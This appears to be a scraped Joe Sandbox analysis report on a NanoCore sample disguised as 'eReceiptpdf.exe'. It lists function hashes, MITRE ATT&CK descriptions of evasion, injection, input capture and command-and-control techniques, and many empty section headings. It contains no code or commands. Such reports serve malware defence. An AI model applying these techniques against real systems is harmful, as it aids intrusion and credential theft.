Instruction Fuzzy Hash: AB210076504240DFCB15CFA4D8C4B2ABBB5FB85354F20C969D8490F296D33AD806CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0152D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.351802371.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6532a2fc967809aca64de1236444fe0323fb0c368bb48e95230bf0cbb3f0767f
Instruction ID: eba0803348c96d5be07ed745cd1d6d39b7407e4bf66b0b730dc569702697195e
Opcode Fuzzy Hash: 6532a2fc967809aca64de1236444fe0323fb0c368bb48e95230bf0cbb3f0767f
Instruction Fuzzy Hash: 4B2180765093808FCB12CF24D994B15BF71FF46214F28C5DAD8498F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0151D49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.351652298.000000000151D000.00000040.00000001.sdmp, Offset: 0151D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction ID: bcfd55cd545446cc733a1fcea63b36e3ad9ffd96ff6f5bbcb9a8d9f0a3dfa133
Opcode Fuzzy Hash: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction Fuzzy Hash: C611B1B6404280CFDB12CF58D5C4B1ABF71FB84324F2486A9D9050F65BC33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report eReceiptpdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections